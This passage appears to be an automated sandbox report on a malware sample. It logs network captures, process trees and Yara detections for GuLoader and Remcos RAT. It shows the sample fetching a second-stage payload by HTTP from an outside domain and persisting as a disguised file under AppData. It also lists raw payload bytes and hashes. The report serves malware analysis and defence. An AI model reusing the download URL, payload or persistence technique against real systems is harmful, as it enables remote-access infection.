Oct 14, 2021 08:40:49.010440111 CEST	7285	IN	Data Raw: d5 73 0c b1 e9 ab 69 f0 0d ce dc 77 67 14 ef 39 dc 5e 2e 15 bc 87 38 f7 eb 1a 07 43 e9 bd 0b 43 27 a6 ce 2d 18 e1 61 04 4e 46 4a f0 2b dc ae 62 54 98 10 17 61 19 39 e9 24 2e d0 d3 8e 38 54 bf d9 76 14 5d c6 86 dc 3d 0b e1 23 85 f2 d2 8e 46 64 14 Data Ascii: siwg9^.8CC'-aNFJ+bTa9$.8Tv]=#Fddwp4"?v{\|8cx[Wj2xZ6tcepFR1a#GjKv7}#T:vA0&gM&Xt0B=>8=^<=)Kaay%m\|j@z
Oct 14, 2021 08:40:49.010524988 CEST	7286	IN	Data Raw: 48 30 f4 2b 6e 72 d3 e2 d4 b3 04 83 42 27 f5 a3 e7 03 45 c9 5a 9d 97 05 91 de 55 b4 6a 79 7a 23 11 bc 82 8b 46 77 db a5 1b f8 ac ea f0 52 07 27 17 d4 cf c1 75 b0 b3 14 53 e7 42 ed 96 b3 69 91 05 1c d3 c4 a4 27 04 47 f8 12 95 91 6a af a9 69 ec ef Data Ascii: H0+nrB'EZUjyz#FwR'uSBi'Gji6Xejl<2i+HaeBMf706;-ustGrc 5bWY9yqn+p5dCR)\|\|G\|0cs-$t<TYva~JGpipec6p?%A^+E+iR
Oct 14, 2021 08:40:49.010576963 CEST	7287	IN	Data Raw: eb 27 a9 cd 18 d8 4d c3 25 8d 5d e8 f6 1b 29 c6 e1 c2 b6 5a c2 18 82 3c 4d 61 09 ff 5d 33 89 95 2c fa 1c 97 2a db 31 54 ca 07 9f f6 fb 8a 60 f1 db 75 23 27 1c 51 fc af 25 ee 11 ab 99 58 32 79 9f e1 5b 97 7d b1 2c a8 ab a3 4e 28 9f 4b 3b 29 62 88 Data Ascii: 'M%])Z<Ma]3,1T`u#'Q%X2y[},N(K;)bKSUmt5ZVO:H^@PS>DH&M%D#KL2ay&Yn(u@(b&i[\|.,9o\|=D-JR
Oct 14, 2021 08:40:49.010649920 CEST	7289	IN	Data Raw: 08 48 64 da fd 72 20 bc f4 f7 d2 56 d6 b9 7b 6d 81 81 23 0b 35 1b b5 c6 be b8 0d f7 b5 31 0d 68 9d 0b 09 28 0e 90 7b 83 d3 38 0a 5c a9 04 8e d2 01 d3 90 a1 c6 24 e9 47 8f 18 33 d8 3c 54 59 76 61 7e 4a 47 70 6e 5c 0d cf 1f 0c 6c 4a 52 9a f6 bd 86 Data Ascii: Hdr V{m#51h({8\$G3<TYva~JGpn\lJRwj}WcE /Ssh V6'=Qy5Gj(?osAM8tQ}YzqSw\|'/MPt~7uu zM9U\"9<\lP,{
Oct 14, 2021 08:40:49.010711908 CEST	7290	IN	Data Raw: 15 00 96 9a 49 d7 2e 8c 8c d9 c7 7e 0e 9e 1f 2d 1a bb 8b ec fd 36 0a 95 1c 60 ad ea 3c 99 d7 ba e5 41 64 79 1c 2f 54 d2 0e f3 5c dd 58 d2 09 fd 2b 61 5a f0 aa 52 34 69 ba fa bd e6 05 f6 35 6c e1 ae ab 51 dc 26 42 1a 9f e1 1a 88 9b 6a 48 7c 11 66 Data Ascii: I.~-6`<Ady/T\X+aZR4i5lQ&BjH\|f!op~.N)q@GZ{mR$a}2"EQ}Ki\|)bseaD%Wlu529T_lb0Zf]1&l#n2,S2!,'i.
Oct 14, 2021 08:40:49.010757923 CEST	7292	IN	Data Raw: 38 da 53 e9 f4 28 14 1c da 9c f3 9e bc 1c c6 19 54 fe e8 f5 e3 a6 c2 94 be dc 9e 13 a0 56 a1 c2 d9 48 9e b6 92 89 5e 60 4a 20 6a a3 84 2b 94 84 fa 53 9d c2 09 91 05 30 69 38 6c 9c 77 d7 5c a7 51 63 ea 61 99 d9 a9 6e 80 ff 23 fe 63 85 0a ee d7 b9 Data Ascii: 8S(TVH^`J j+S0i8lw\Qcan#c7k*\zLH{IFB>%V-m^:^?Qit9Ybv_f@=v<DRF5o LX 9Q)QFQ>-`#"yLox6i-4T]I>DBn
Oct 14, 2021 08:40:49.010806084 CEST	7293	IN	Data Raw: 03 53 a3 a1 0a 66 34 13 d9 e3 10 9f 07 dd 91 e8 77 9b 7d 6d 29 f7 4c 70 a6 59 12 06 f2 81 a2 51 d4 51 ca 93 9d e7 2c 25 42 f7 43 dc 33 58 c6 19 46 05 bf a1 26 5b f3 cb 32 a7 ef f9 71 0c 03 bb 54 99 b5 7a a8 89 9f c7 d3 fa 59 7a ef b4 6f d7 fe 6b Data Ascii: Sf4w}m)LpYQQ,%BC3XF&[2qTzYzok'BrtQBG2K3]-HP}8mbk8O./Um7vn\|8l5*6x.T5<)1HnaB6t2`B]&Y7uog=:vFR\|HFA
Oct 14, 2021 08:40:49.031682968 CEST	7295	IN	Data Raw: 28 1c 8b 27 ed 64 aa 3a ae 91 19 fb f1 fc cd d0 a2 a4 61 97 76 9d 25 32 89 d4 9b 7d c0 04 c6 0c f4 73 28 af de 87 ac 68 fe 34 6f 60 3a 57 96 1d 98 25 48 31 6b 7c 60 4c d5 42 af a3 bc 11 16 fe 33 86 44 2e fa 71 1c 52 1b cf 84 1f fd 97 6d 34 80 53 Data Ascii: ('d:av%2}s(h4o`:W%H1k\|`LB3D.qRm4S3)+^n%YB/]L<2d@ZNg5,DW\%u^EQ}8C_JVED@dlnX}"IrI>DMBL7PqUe~

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49811	83.167.224.147	80	C:\Users\user\Desktop\mU9H96igb3.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:40:55.734740019 CEST	7775	OUT	GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: implantecapilarpereira.com Cache-Control: no-cache
Oct 14, 2021 08:40:55.757066011 CEST	7777	IN	HTTP/1.1 200 OK Date: Thu, 14 Oct 2021 06:40:55 GMT Server: Apache Last-Modified: Wed, 13 Oct 2021 14:14:17 GMT Accept-Ranges: bytes Content-Length: 470592 Content-Type: application/octet-stream Data Raw: 0c 8d eb eb 31 58 14 5e 5c 4a 0e a8 9f a5 08 3f 56 7c 97 42 71 30 48 0c ab 52 7d 99 99 e0 3d ef cc 2b 96 6c 96 b7 11 05 bd 89 e3 b9 f9 0d ad 44 dd a4 e4 f0 f4 d0 42 90 3e 9b a6 de e6 4d fb ce a4 02 80 7a b6 00 5e 79 5c 99 e0 f1 bb f5 73 cb 38 71 04 72 b9 e3 3c 5c 47 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 47 ce 96 d0 c1 de 44 4e 38 6b d7 6f 9f 05 7f 51 a0 b0 51 8b 8c 3c 4b a8 46 c0 90 71 f4 fc 14 27 c7 54 6a 7e b8 0a 54 64 15 ee d0 ea b2 53 5c 38 a6 a3 44 51 1e eb 9d bc df 68 f3 c3 57 ad 42 bc 69 2b 17 df 26 db b3 06 85 63 e4 69 c3 ea 73 46 a7 df b2 b1 d1 28 37 eb e1 4f 92 25 e6 0b d2 40 c8 57 79 92 30 8f 30 7f a9 5b 87 4a dd a5 cb 1d 1b 49 ae 98 83 51 d0 22 ab 30 52 10 ba 6a 18 3d f7 6b 53 e6 a9 11 57 c4 e4 e3 83 22 e9 4c 07 9c e0 87 87 2e 0d 1b ff 13 1c ae 7d 99 e4 66 9b 06 b1 7c e2 ff 46 33 7c fa 25 9f aa b6 d9 59 d8 55 14 93 37 51 3b bf e8 4d c4 45 25 e8 86 75 88 4d 57 80 38 9d d9 8f a6 7d 04 78 c3 3e 3f 7a ba df ab 31 b3 4b dc 58 0a ab 00 ab 64 f8 9f 96 40 b4 ba 49 ee f1 96 f2 cb dd 14 1b 77 4e cc 24 a2 9c f8 83 df 4f 32 bf 04 61 43 97 08 92 b5 ea 8f 18 1c 49 4b d1 42 67 93 98 71 dd a4 d6 f2 8b 17 fb 9e 00 96 97 9e 1b a1 ac 02 e9 94 84 ff d8 d1 ce 22 dc 0d 1b a2 21 26 90 4c 10 2f 8a 00 e8 24 89 86 34 56 11 0b b2 3b fd a8 18 0e a6 5c 77 77 14 66 6c 34 d5 6d 11 d6 85 27 58 2c 4c 51 2b e9 bd 0b 03 76 2f 83 4e 9d 21 99 8d 0b be b5 e5 ec ee 6b 29 df 60 93 e8 9e 6c 3e db e4 c7 36 d3 8e 38 02 34 ec b2 26 48 c1 0b 5d f9 5b 8b 07 81 34 21 f3 46 33 eb 04 0e 77 0b 8e 60 ac 61 c2 fd 71 da 47 99 3c 42 38 53 fd 9f 9f b9 7b 78 08 c7 8d 44 1b fe 34 6f 3d f9 01 c1 96 62 ae b9 da 4b f2 ae d8 2b a5 50 5c ec f9 52 fe 33 86 c7 e8 e2 4a eb 27 f7 90 da dc 4d 96 ae 61 0b bf 7d 48 55 28 68 e1 5e ec c1 84 9c b2 83 e5 d9 8b 48 cc dc 9c c4 f7 e5 68 d5 f0 c9 df 04 50 c9 1e cd 8a 60 f1 30 7b 49 27 83 0a 82 23 8f 99 70 ab 1d 06 29 66 60 94 67 19 b3 e6 b4 4e 57 5c 95 7d 77 db cb d6 9d 0b d4 07 c0 9d ee ad 89 51 b3 51 fe 43 4f 09 c8 4b e6 f7 52 fb ee 83 ba bb b9 d7 32 47 1e 6b e5 90 01 46 c2 b6 69 c7 14 db af ac f9 38 54 04 84 fb ee cd fe 6a b7 92 b5 25 2e 90 cf 59 fc c9 c4 12 bc cd d1 4f 8e 4c 92 58 c3 6c 25 91 4a 00 26 15 c1 e5 6a e3 eb 65 02 b8 6e 28 85 9b ad cc f8 ea ac ab 2d b5 37 02 80 9b 77 84 11 78 33 0d 7b 50 7d eb 81 b5 0b 42 19 8e 39 dd d0 15 51 54 da d1 2e c9 aa 59 21 9d 05 07 69 b8 f7 5a 7b 75 8b 22 a3 68 27 72 38 3f e0 7a 86 c4 fa 86 aa c5 78 c1 be 75 40 e3 81 d0 a1 c4 c0 ec 90 21 82 e4 84 26 e9 a0 af bc b1 9e 2e 6d ba 60 b3 7b 9b 52 cd 6e 30 af 8a 57 b9 45 ec 10 02 90 f6 2a e6 e5 49 5f d8 96 4b 12 42 cd c1 00 60 73 82 92 a2 ba 44 fd a2 11 42 ee 59 5a 5d ae 8d 08 21 89 62 92 3c da 37 fb ab 20 d4 a7 39 92 0b 0d 32 a5 6e 0b 1b b1 e9 58 10 7a b5 00 5e 79 58 99 e0 f1 44 0a 73 cb 80 71 04 72 b9 e3 3c 5c 07 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 57 cf 96 d0 cf c1 fe 40 38 df de a2 be bd 7e 1d 6d 91 05 e3 e5 4f 6b d8 34 af f7 03 95 91 34 44 a6 3a 04 11 cc 2a 36 01 35 9c a5 84 92 3a 32 18 e2 ec 17 71 73 84 f9 d9 f1 65 fe c9 73 ad 42 bc 69 2b 17 df 8c d8 f3 36 6b 01 ca 0a 2d 88 5d 25 49 bd 9c d2 8b d6 e8 88 1d 2d bc 46 bc f5 0f 23 87 35 57 f1 6a 71 ec 1c 59 39 a9 29 3a bf 61 7e f4 2b 80 fb f3 93 39 f8 97 92 3a 73 87 35 3a 5f 03 61 2a a9 39 2d 94 00 d9 83 ad 18 ff c9 c5 3e 6a e5 41 f8 fa 01 42 18 86 e0 16 fa e2 94 5d 67 7e 46 0f 25 3b Data Ascii: 1X^\J?V\|Bq0HR}=+lDB>Mz^y\s8qr<\GB>KEXU:3Mu{GDN8koQQ<KFq'Tj~TdS\8DQhWBi+&cisF(7O%@Wy00[JIQ"0Rj=kSW"L.}f\|F3\|%YU7Q;ME%uMW8}x>?z1KXd@IwN$O2aCIKBgq"!&L/$4V;\wwfl4m'X,LQ+v/N!k)`l>684&H][4!F3w`aqG<B8S{xD4o=bK+P\R3J'Ma}HU(h^HhP`0{I'#p)f`gNW\}wQQCOKR2GkFi8Tj%.YOLXl%J&jen(-7wx3{P}B9QT.Y!iZ{u"h'r8?zxu@!&.m`{Rn0WEI_KB`sDBYZ]!b<7 92nXz^yXDsqr<\B>KEXU:3Mu{W@8~mOk44D:65:2qsesBi+6k-]%I-F#5WjqY9):a~+9:s5:_a*9->jAB]g~F%;
Oct 14, 2021 08:40:55.757129908 CEST	7778	IN	Data Raw: ce 1d 98 7c 62 94 d5 a5 0d 62 1a be f1 f1 48 ab 81 c4 76 e8 4d 4b 63 4d f5 e9 25 e0 41 16 3f 9f 8f 65 2c ec 5b cd 3e 3f 12 cf f3 ee 31 5b 11 65 1f 0a f2 8f c0 63 41 8c dc 51 d5 52 e9 d9 f1 96 9a 47 f1 b1 1b 9d 0d 2e 27 ac c5 3b 1a 62 8e 74 b5 ee Data Ascii: \|bbHvMKcM%A?e,[>?1[ecAQRG.';bt0S:uBU!j6H9wKJL\|Ewl6VS?9vg\|Pq>7&QyMIN]5;+l6FG4RZxcHaF3"2fDcG l?u
Oct 14, 2021 08:40:55.757179022 CEST	7780	IN	Data Raw: 9c e2 44 9a 88 4e 6e 1d ae a1 57 42 77 ed a9 a1 ec e5 70 12 04 21 0f db 49 30 ad 64 14 81 9f 35 b4 1d 20 d4 5b 4d 07 bd fc d0 7a f5 0a ad 41 d7 63 f2 91 e8 61 d1 92 bf ec 5f f8 dc 42 cd 1b c1 22 cf 5f e4 86 b1 f9 64 6f 09 d5 b3 6e a5 e0 ad 9a f6 Data Ascii: DNnWBwp!I0d5 [MzAca_B"_dongR2}m]9e)'ZS?hu_K(q*V9Po.<)cfk_(:T^.}Ouif"nM6~X Sq}<gDGL=lE!o@V
Oct 14, 2021 08:40:55.757225037 CEST	7781	IN	Data Raw: d5 73 0c b1 e9 ab 69 f0 0d ce dc 77 67 14 ef 39 dc 5e 2e 15 bc 87 38 f7 eb 1a 07 43 e9 bd 0b 43 27 a6 ce 2d 18 e1 61 04 4e 46 4a f0 2b dc ae 62 54 98 10 17 61 19 39 e9 24 2e d0 d3 8e 38 54 bf d9 76 14 5d c6 86 dc 3d 0b e1 23 85 f2 d2 8e 46 64 14 Data Ascii: siwg9^.8CC'-aNFJ+bTa9$.8Tv]=#Fddwp4"?v{\|8cx[Wj2xZ6tcepFR1a#GjKv7}#T:vA0&gM&Xt0B=>8=^<=)Kaay%m\|j@z
Oct 14, 2021 08:40:55.757270098 CEST	7782	IN	Data Raw: 48 30 f4 2b 6e 72 d3 e2 d4 b3 04 83 42 27 f5 a3 e7 03 45 c9 5a 9d 97 05 91 de 55 b4 6a 79 7a 23 11 bc 82 8b 46 77 db a5 1b f8 ac ea f0 52 07 27 17 d4 cf c1 75 b0 b3 14 53 e7 42 ed 96 b3 69 91 05 1c d3 c4 a4 27 04 47 f8 12 95 91 6a af a9 69 ec ef Data Ascii: H0+nrB'EZUjyz#FwR'uSBi'Gji6Xejl<2i+HaeBMf706;-ustGrc 5bWY9yqn+p5dCR)\|\|G\|0cs-$t<TYva~JGpipec6p?%A^+E+iR
Oct 14, 2021 08:40:55.757318020 CEST	7784	IN	Data Raw: eb 27 a9 cd 18 d8 4d c3 25 8d 5d e8 f6 1b 29 c6 e1 c2 b6 5a c2 18 82 3c 4d 61 09 ff 5d 33 89 95 2c fa 1c 97 2a db 31 54 ca 07 9f f6 fb 8a 60 f1 db 75 23 27 1c 51 fc af 25 ee 11 ab 99 58 32 79 9f e1 5b 97 7d b1 2c a8 ab a3 4e 28 9f 4b 3b 29 62 88 Data Ascii: 'M%])Z<Ma]3,1T`u#'Q%X2y[},N(K;)bKSUmt5ZVO:H^@PS>DH&M%D#KL2ay&Yn(u@(b&i[\|.,9o\|=D-JR
Oct 14, 2021 08:40:55.757363081 CEST	7785	IN	Data Raw: 08 48 64 da fd 72 20 bc f4 f7 d2 56 d6 b9 7b 6d 81 81 23 0b 35 1b b5 c6 be b8 0d f7 b5 31 0d 68 9d 0b 09 28 0e 90 7b 83 d3 38 0a 5c a9 04 8e d2 01 d3 90 a1 c6 24 e9 47 8f 18 33 d8 3c 54 59 76 61 7e 4a 47 70 6e 5c 0d cf 1f 0c 6c 4a 52 9a f6 bd 86 Data Ascii: Hdr V{m#51h({8\$G3<TYva~JGpn\lJRwj}WcE /Ssh V6'=Qy5Gj(?osAM8tQ}YzqSw\|'/MPt~7uu zM9U\"9<\lP,{
Oct 14, 2021 08:40:55.757407904 CEST	7787	IN	Data Raw: 15 00 96 9a 49 d7 2e 8c 8c d9 c7 7e 0e 9e 1f 2d 1a bb 8b ec fd 36 0a 95 1c 60 ad ea 3c 99 d7 ba e5 41 64 79 1c 2f 54 d2 0e f3 5c dd 58 d2 09 fd 2b 61 5a f0 aa 52 34 69 ba fa bd e6 05 f6 35 6c e1 ae ab 51 dc 26 42 1a 9f e1 1a 88 9b 6a 48 7c 11 66 Data Ascii: I.~-6`<Ady/T\X+aZR4i5lQ&BjH\|f!op~.N)q@GZ{mR$a}2"EQ}Ki\|)bseaD%Wlu529T_lb0Zf]1&l#n2,S2!,'i.
Oct 14, 2021 08:40:55.757453918 CEST	7788	IN	Data Raw: 38 da 53 e9 f4 28 14 1c da 9c f3 9e bc 1c c6 19 54 fe e8 f5 e3 a6 c2 94 be dc 9e 13 a0 56 a1 c2 d9 48 9e b6 92 89 5e 60 4a 20 6a a3 84 2b 94 84 fa 53 9d c2 09 91 05 30 69 38 6c 9c 77 d7 5c a7 51 63 ea 61 99 d9 a9 6e 80 ff 23 fe 63 85 0a ee d7 b9 Data Ascii: 8S(TVH^`J j+S0i8lw\Qcan#c7k*\zLH{IFB>%V-m^:^?Qit9Ybv_f@=v<DRF5o LX 9Q)QFQ>-`#"yLox6i-4T]I>DBn
Oct 14, 2021 08:40:55.757500887 CEST	7789	IN	Data Raw: 03 53 a3 a1 0a 66 34 13 d9 e3 10 9f 07 dd 91 e8 77 9b 7d 6d 29 f7 4c 70 a6 59 12 06 f2 81 a2 51 d4 51 ca 93 9d e7 2c 25 42 f7 43 dc 33 58 c6 19 46 05 bf a1 26 5b f3 cb 32 a7 ef f9 71 0c 03 bb 54 99 b5 7a a8 89 9f c7 d3 fa 59 7a ef b4 6f d7 fe 6b Data Ascii: Sf4w}m)LpYQQ,%BC3XF&[2qTzYzok'BrtQBG2K3]-HP}8mbk8O./Um7vn\|8l5*6x.T5<)1HnaB6t2`B]&Y7uog=:vFR\|HFA
Oct 14, 2021 08:40:55.778264046 CEST	7791	IN	Data Raw: 28 1c 8b 27 ed 64 aa 3a ae 91 19 fb f1 fc cd d0 a2 a4 61 97 76 9d 25 32 89 d4 9b 7d c0 04 c6 0c f4 73 28 af de 87 ac 68 fe 34 6f 60 3a 57 96 1d 98 25 48 31 6b 7c 60 4c d5 42 af a3 bc 11 16 fe 33 86 44 2e fa 71 1c 52 1b cf 84 1f fd 97 6d 34 80 53 Data Ascii: ('d:av%2}s(h4o`:W%H1k\|`LB3D.qRm4S3)+^n%YB/]L<2d@ZNg5,DW\%u^EQ}8C_JVED@dlnX}"IrI>DMBL7PqUe~

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: mU9H96igb3.exe PID: 4448 Parent PID: 8072

General

Start time:	08:37:38
Start date:	14/10/2021
Path:	C:\Users\user\Desktop\mU9H96igb3.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\mU9H96igb3.exe'
Imagebase:	0x400000
File size:	208896 bytes
MD5 hash:	8777020A37B6797241A489A707B9784B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: mU9H96igb3.exe PID: 6380 Parent PID: 4448

General

Start time:	08:38:19
Start date:	14/10/2021
Path:	C:\Users\user\Desktop\mU9H96igb3.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\mU9H96igb3.exe'
Imagebase:	0x400000
File size:	208896 bytes
MD5 hash:	8777020A37B6797241A489A707B9784B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 512 Parent PID: 6380

General

Start time:	08:38:59
Start date:	14/10/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Imagebase:	0x330000
File size:	147456 bytes
MD5 hash:	4D780D8F77047EE1C65F747D9F63A1FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6504 Parent PID: 512

General

Start time:	08:39:00
Start date:	14/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Imagebase:	0xf00000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 1344 Parent PID: 6504

General

Start time:	08:39:00
Start date:	14/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7bf390000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: Dlls.exe PID: 2916 Parent PID: 6504

General

Start time:	08:39:00
Start date:	14/10/2021
Path:	C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Imagebase:	0x400000
File size:	208896 bytes
MD5 hash:	8777020A37B6797241A489A707B9784B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 26%, Metadefender, Browse Detection: 24%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: Dlls.exe PID: 2072 Parent PID: 4680

General

Start time:	08:39:09
Start date:	14/10/2021
Path:	C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Imagebase:	0x70000
File size:	208896 bytes
MD5 hash:	8777020A37B6797241A489A707B9784B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Dlls.exe PID: 6216 Parent PID: 4680

General

Start time:	08:39:17
Start date:	14/10/2021
Path:	C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Imagebase:	0x400000
File size:	208896 bytes
MD5 hash:	8777020A37B6797241A489A707B9784B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Dlls.exe PID: 7300 Parent PID: 4680

General

Start time:	08:39:25
Start date:	14/10/2021
Path:	C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Imagebase:	0x400000
File size:	208896 bytes
MD5 hash:	8777020A37B6797241A489A707B9784B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Dlls.exe PID: 7852 Parent PID: 2916

General

Start time:	08:39:45
Start date:	14/10/2021
Path:	C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Imagebase:	0x400000
File size:	208896 bytes
MD5 hash:	8777020A37B6797241A489A707B9784B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Dlls.exe PID: 3384 Parent PID: 6216

General

Start time:	08:40:04
Start date:	14/10/2021
Path:	C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Imagebase:	0x400000
File size:	208896 bytes
MD5 hash:	8777020A37B6797241A489A707B9784B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Dlls.exe PID: 4696 Parent PID: 7300

General

Start time:	08:40:12
Start date:	14/10/2021
Path:	C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Imagebase:	0x400000
File size:	208896 bytes
MD5 hash:	8777020A37B6797241A489A707B9784B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: mU9H96igb3.exe PID: 4448 Parent PID: 8072 mU9H96igb3.exeCOMMON

Executed Functions

Function 02C01BCE, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 566COMMON

Download Yara Rule

Strings

Gf8, xrefs: 02BFC7D9
Z5, xrefs: 02C03D6F

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: Gf8$Z5
API String ID: 3389902171-947967345
Opcode ID: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction ID: 1a49fedadf5d9dc8ca6852c142f8477781d4f7a645114143fe9f2f53e4495fdf
Opcode Fuzzy Hash: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction Fuzzy Hash: CF32A2315083C58FDB75CF38C8987DABBA2AF56310F4982AADC998F2D6D3308645C716

Uniqueness

Uniqueness Score: -1.00%

Function 02BF7574, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 800COMMON

Download Yara Rule

Strings

QJQ, xrefs: 02BF1C83

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: QJQ
API String ID: 2616484454-1123671965
Opcode ID: 23a87022dab17b6a7da1b40d579749e676e298f6ed3110e98488bc9b326012ff
Instruction ID: d7adbbc9c50dd99f743817d8e9feae90b4407a870fc5722b2a85a0f56244db11
Opcode Fuzzy Hash: 23a87022dab17b6a7da1b40d579749e676e298f6ed3110e98488bc9b326012ff
Instruction Fuzzy Hash: 807212B1604389DFDBB49F78C9917EA7BA2FF55340F01815ADD8A9B210D7309A89CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02C0130A, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 790COMMON

Download Yara Rule

Strings

QJQ, xrefs: 02BF1C83

Memory Dump Source

Source File: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: QJQ
API String ID: 0-1123671965
Opcode ID: 3c8faa50bc7a6fbf58bdea1535cfeafc80df8a2332d9c73fd0d59aeacaf475f7
